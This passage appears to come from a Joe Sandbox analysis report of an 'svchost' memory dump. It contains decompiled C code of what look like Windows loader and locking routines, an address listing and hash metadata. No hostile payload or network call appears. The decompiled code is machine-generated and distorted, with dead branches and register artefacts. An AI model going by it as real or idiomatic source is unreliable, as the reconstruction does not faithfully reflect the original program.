									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E03047D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x3005c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E0305F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E0305F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E030A7016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L03042400(_t267 + 0x20);
															}
															L03042400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E03052397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E03042280(_t134, 0x3118608);
									__eflags =  *0x3116e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E0303FFB0(_t198, _t241, 0x3118608);
										__eflags = _t253;
										if(_t253 != 0) {
											L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x3116e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x3118608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E03056B90(_t210,  &_v64);
										_t262 =  *0x3118608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E0305E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E030697C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E0306006A(0x3118608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x3118608);
												E0306B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x3116904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x3116e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E0303FFB0(_t198, _t240, 0x3118608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E030600C2(0x3118608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                        0x030520a0
                        0x030520a8
                        0x030520ad
                        0x030520b3
                        0x030520b8
                        0x030520c2
                        0x030520c7
                        0x030520cb
                        0x030520d2
                        0x03052263
                        0x03052266
                        0x03095836
                        0x03095836
                        0x00000000
                        0x0305226c
                        0x0305226c
                        0x03052270
                        0x03052274
                        0x030520e2
                        0x030520e2
                        0x030520e6
                        0x030520ee
                        0x030957dc
                        0x030957de
                        0x030957ec
                        0x030957ec
                        0x030957f1
                        0x030957f3
                        0x030957f8
                        0x00000000
                        0x030957f8
                        0x030957e0
                        0x030957e4
                        0x030957ea
                        0x00000000
                        0x00000000
                        0x00000000
                        0x030957ea
                        0x030520f4
                        0x030520f4
                        0x030520f8
                        0x030520f8
                        0x030520fc
                        0x03052100
                        0x03052106
                        0x03052201
                        0x03052206
                        0x0305220b
                        0x0305220e
                        0x030522a9
                        0x030522ac
                        0x00000000
                        0x00000000
                        0x030522b2
                        0x030522b5
                        0x03095801
                        0x03095806
                        0x00000000
                        0x00000000
                        0x03095810
                        0x03095815
                        0x03095818
                        0x00000000
                        0x00000000
                        0x0309581e
                        0x030522bb
                        0x030522bb
                        0x03052218
                        0x03052218
                        0x0305221c
                        0x03052220
                        0x03052222
                        0x030522c2
                        0x030522c4
                        0x030522dc
                        0x030522dc
                        0x030522e1
                        0x00000000
                        0x00000000
                        0x00000000
                        0x030522e7
                        0x030522c8
                        0x030522cd
                        0x030522d3
                        0x030522d6
                        0x03095823
                        0x03095825
                        0x03095827
                        0x00000000
                        0x00000000
                        0x0309582d
                        0x00000000
                        0x0309582d
                        0x00000000
                        0x03052228
                        0x03052228
                        0x00000000
                        0x03052228
                        0x03052222
                        0x03052214
                        0x03052214
                        0x00000000
                        0x03052114
                        0x03052114
                        0x03052114
                        0x0305211a
                        0x0305211c
                        0x03052348
                        0x0305234d
                        0x03095840
                        0x03095845
                        0x03095848
                        0x0309584e
                        0x0309584e
                        0x03095848
                        0x03052353
                        0x03052355
                        0x03052388
                        0x03052388
                        0x03052368
                        0x0305236a
                        0x0305236c
                        0x0305238f
                        0x00000000
                        0x0305236e
                        0x0305236e
                        0x0305218e
                        0x0305218e
                        0x03052191
                        0x03052195
                        0x03095a03
                        0x03095a06
                        0x03095a0c
                        0x03095a0f
                        0x03095a11
                        0x03095a13
                        0x03095a13
                        0x03095a19
                        0x03095a1f
                        0x00000000
                        0x0305219b
                        0x0305219b
                        0x030521a0
                        0x03052282
                        0x03052284
                        0x03052284
                        0x03052284
                        0x03052284
                        0x030521a6
                        0x030521a9
                        0x030521ac
                        0x030521ae
                        0x030521b3
                        0x0305228b
                        0x03052290
                        0x03052379
                        0x03052296
                        0x03052298
                        0x03052298
                        0x03052290
                        0x030521b9
                        0x030521be
                        0x030522a2
                        0x030522a2
                        0x030521c4
                        0x030521c8
                        0x030521cc
                        0x030521d0
                        0x030521d4
                        0x030521de
                        0x030521e3
                        0x03095a29
                        0x03095a2c
                        0x00000000
                        0x00000000
                        0x03095a3b
                        0x00000000
                        0x030521e9
                        0x030521e9
                        0x030521e9
                        0x030521ee
                        0x030521f1
                        0x03095a45
                        0x03095a4b
                        0x03095a52
                        0x03095a58
                        0x03095a5d
                        0x03095a5f
                        0x03095a71
                        0x03095a61
                        0x03095a6a
                        0x03095a6a
                        0x03095a76
                        0x03095a79
                        0x03095a7f
                        0x03095a83
                        0x03095a85
                        0x03095a87
                        0x03095a87
                        0x03095a8c
                        0x03095a91
                        0x03095a97
                        0x03095a9f
                        0x03095aa0
                        0x03095aa1
                        0x03095aa6
                        0x03095aab
                        0x03095ab1
                        0x03095ab3
                        0x03095ab9
                        0x03095aca
                        0x03095ad4
                        0x03095ad4
                        0x03095ade
                        0x03095ade
                        0x03095aab
                        0x03095a79
                        0x03095a52
                        0x030521f7
                        0x030521f9
                        0x030521fe
                        0x030521fe
                        0x030521e3
                        0x03052195
                        0x0305236c
                        0x03052122
                        0x03052122
                        0x03052124
                        0x03052231
                        0x03052236
                        0x03052236
                        0x03052238
                        0x03052238
                        0x03052240
                        0x03052242
                        0x03052244
                        0x030959fc
                        0x0305218c
                        0x0305218c
                        0x00000000
                        0x0305218c
                        0x0305224a
                        0x0305224f
                        0x03052256
                        0x03052304
                        0x03052309
                        0x0305230f
                        0x0305231e
                        0x0305231e
                        0x0305231e
                        0x03052320
                        0x03052325
                        0x0305232a
                        0x0305232c
                        0x0305233e
                        0x0305233e
                        0x00000000
                        0x0305232c
                        0x03052311
                        0x03052317
                        0x0305231a
                        0x0305231c
                        0x03052380
                        0x03052380
                        0x03052380
                        0x03052384
                        0x00000000
                        0x00000000
                        0x03052386
                        0x00000000
                        0x0305231c
                        0x0305225c
                        0x0305225c
                        0x00000000
                        0x0305225c
                        0x0305212a
                        0x03052134
                        0x03052138
                        0x0305213d
                        0x03095858
                        0x03095863
                        0x03095863
                        0x03095867
                        0x0309586a
                        0x00000000
                        0x00000000
                        0x0309586c
                        0x0309586c
                        0x03095871
                        0x03095875
                        0x03095877
                        0x03095997
                        0x0309599c
                        0x030959a1
                        0x030959a7
                        0x030959a7
                        0x00000000
                        0x030959a7
                        0x0309587d
                        0x00000000
                        0x0309588b
                        0x0309588b
                        0x03095890
                        0x03095892
                        0x03095894
                        0x03095899
                        0x0309589b
                        0x030958a0
                        0x030958a0
                        0x030958aa
                        0x030958b2
                        0x030958b6
                        0x030958be
                        0x030958c6
                        0x030958c9
                        0x0309590d
                        0x03095917
                        0x0309591a
                        0x0309591c
                        0x03095920
                        0x03095928
                        0x0309592a
                        0x0309592c
                        0x0309592e
                        0x0309592e
                        0x030958cb
                        0x030958cd
                        0x030958d8
                        0x030958e0
                        0x030958f4
                        0x030958fe
                        0x030958fe
                        0x0309593a
                        0x0309593e
                        0x03095940
                        0x03095942
                        0x00000000
                        0x03095944
                        0x03095944
                        0x03095949
                        0x0309594e
                        0x0309594e
                        0x03095953
                        0x0309595b
                        0x03095976
                        0x03095976
                        0x0309597a
                        0x0309597f
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x03095981
                        0x03095981
                        0x03095981
                        0x03095983
                        0x03095988
                        0x0309598d
                        0x03095991
                        0x03095991
                        0x00000000
                        0x0309595d
                        0x0309595d
                        0x03095963
                        0x03095965
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x03095967
                        0x03095967
                        0x0309596b
                        0x0309596d
                        0x00000000
                        0x00000000
                        0x0309596f
                        0x03095971
                        0x03095971
                        0x03095974
                        0x00000000
                        0x00000000
                        0x00000000
                        0x03095974
                        0x00000000
                        0x03095967
                        0x0309595b
                        0x03095942
                        0x03095863
                        0x03052143
                        0x03052143
                        0x03052149
                        0x0305214f
                        0x030522f1
                        0x030522f6
                        0x00000000
                        0x03052173
                        0x03052173
                        0x0305217d
                        0x03052181
                        0x03052186
                        0x030959ae
                        0x030959b2
                        0x030959b5
                        0x030959b7
                        0x030959ba
                        0x030959cd
                        0x030959d1
                        0x030959d5
                        0x030959d9
                        0x030959db
                        0x00000000
                        0x00000000
                        0x030959dd
                        0x030959dd
                        0x030959e1
                        0x030959e4
                        0x030959e7
                        0x030959ee
                        0x030959ee
                        0x030959f3
                        0x030959f3
                        0x00000000
                        0x03052186
                        0x0305214f
                        0x03052106
                        0x03052266
                        0x030520d8
                        0x030520da
                        0x030520e0
                        0x00000000
                        0x00000000
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 758ff20b7b024ba72385e25f5c1029f961c0856baa07166b5f9db054e5624ef1
                        • Instruction ID: ef645060ae031cebaed83df974bc7baafcc612cc0e89460694a7d407925ed7c7
                        • Opcode Fuzzy Hash: 758ff20b7b024ba72385e25f5c1029f961c0856baa07166b5f9db054e5624ef1
                        • Instruction Fuzzy Hash: 77F1F43560A3059FEB66CB29C84076BB7EDAF86314F088D5EFC959B280D734D841CB56
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0303D5E0 Relevance: .4, Instructions: 353COMMONCrypto
                        Download Yara Rule
                        C-Code - Quality: 87%
                        			E0303D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x311d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E03036600(0x31152d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x3117b9c; // 0x0
							_t281 = L03044620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E0306F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x3117b90; // 0x77380000
								if(_t384 == 0) {
									_t353 =  *0x3117b8c; // 0x2803458
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E03042280(_t200, 0x31184d8);
									_t277 =  *0x31185f4; // 0x2804700
									_t351 =  *0x31185f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x2804698
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E0303FFB0(_t287, _t353, 0x31184d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E0307CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E03036600(0x31152d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E03037926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x311b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E030AE974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x3118472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x311b218; // 0x0
														asm("ror edi, cl");
														 *0x311b1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E03042280(_t250, 0x31184d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L03063898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E0303FFB0(_t293, _t353, 0x31184d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E030637F5(_t353, 0);
																}
																E03060413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E03059B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E030502D6(_t174);
																}
																L030477F0( *0x3117b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E0305C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L0303EC7F(_t353);
										L030519B8(_t287, 0, _t353, 0);
										_t200 = E0302F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E0306B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x311b2f8; // 0x300000
									if((_t206 |  *0x311b2fc) == 0 || ( *0x311b2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x311b2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E030D6B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E030D6AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E0303E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L0303EAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E03069730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E0303E9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
